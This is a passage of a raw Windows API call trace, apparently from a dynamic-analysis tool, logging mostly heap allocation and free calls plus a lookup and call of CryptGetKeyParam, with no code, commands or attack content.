Flags=0x0, Size=0x10) returned 0x43ca580 [0118.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0118.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0118.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0118.128] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0118.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0118.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0118.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0118.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0118.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0118.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0118.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0118.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.144] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0118.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0118.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0118.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0118.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0118.145] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0118.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0118.145] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0118.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0118.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0118.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0118.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0118.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0118.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0118.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0118.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0118.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0118.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0118.147] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.147] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0118.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0118.148] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0118.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0118.149] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2530, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2530*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.150] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0118.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.151] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0118.151] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: 